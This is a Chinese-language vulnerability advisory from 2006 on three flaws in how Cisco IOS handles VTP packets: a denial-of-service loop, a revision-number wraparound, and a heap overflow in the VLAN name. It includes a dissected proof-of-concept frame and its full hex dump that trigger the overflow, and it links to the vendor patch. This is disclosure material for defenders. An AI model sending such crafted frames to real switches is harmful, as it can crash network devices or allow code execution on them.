发布日期：2006-09-12
更新日期：2006-09-14

受影响系统：

Cisco IOS 12.1(19)

描述：

---

BUGTRAQ  ID: 19998

Cisco VLAN中继协议（VTP）是思科第2层信息传送协议，主要控制网络范围内VLAN的添加、删除和重命名。

Cisco IOS在处理特制VTP报文时存在多个漏洞，具体如下：

1 拒绝服务

如果向Cisco IOS设备发送了VTP version 1摘要帧并将VTP版本字段设置为2的话，VTP处理进程就会陷入循环，最终由系统watchdog进程终止，导致设备重载。

2 VTP修改版本整数回绕

如果攻击者能够向Cisco IOS或CatOS设备发送VTP更新（摘要和sub）的话，就可以自己选择VTP信息的修改版本号。IOS会接受0x7FFFFFFF这个版本号。当运算符更改交换机VLAN配置时，IOS就会将版本号增加为0x80000000，然后由有符整数变量内部追踪这个版本号。因此，这个修改版本号会被处理为很大的负值。从这时起交换机无法同更改的VLAN配置通讯，因为所有其他交换机都会拒绝这个生成的更新，

3 VLAN名称堆溢出

如果攻击者能够向Cisco IOS设备发送VTP更新的话，类型2帧包含有每个VLAN的记录。VTP记录的一个字段中包含有VLAN的名称，另一个字段为这个名称的长度。如果更新的VLAN名称大于100字节且VLAN名称长度字段正确的话，就会导致堆溢出，在接收的交换机上执行任意代码。

<*来源：FX （fx@phenoelit.de）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=115817075024127&w=2
        http://www.cisco.com/warp/public/707/cisco-sr-20060913-vtp.shtml
        http://secunia.com/advisories/21902/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

IEEE 802.3 Ethernet
            Destination: CDP/VTP (01:00:0c:cc:cc:cc)
            Source: <any>
            Length: 260
        Logical-Link Control
        Virtual Trunking Protocol
            Version: 0x01
            Code: Subset-Advert (0x02)
            Sequence Number: 1
            Management Domain Length: 5
            Management Domain: AAAAA
            Configuration Revision Number: 3
            VLAN Information
                VLAN Information Length: 212
                Status: 0x00
                VLAN Type: Ethernet (0x01)
                VLAN Name Length: 200
                ISL VLAN ID: 0x0001
                MTU Size: 1500
                802.10 Index: 0x000186a1
                VLAN Name: AAAAA[...]AAAAAA (200 in total)
        
        0000  01 00 0c cc cc cc 00 fe fe c0 01 00 01 04 aa aa   ...........^....
        0010  03 00 00 0c 20 03 01 02 01 05 41 41 41 41 41 00   .... .....AAAAA.
        0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
        0030  00 00 00 00 00 00 00 00 00 00 00 00 00 03 d4 00   ................
        0040  01 c8 00 01 05 dc 00 01 86 a1 41 41 41 41 41 41   ..........AAAAAA
        0050  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0060  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0070  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0080  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0090  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00a0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00b0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00c0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00d0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00e0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00f0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0100  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0110  41 41                                             AA

建议：

---

厂商补丁：

Cisco
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.cisco.com/warp/public/707/cisco-sr-20060913-vtp.shtml

浏览次数：3502
严重程度：0（网友投票）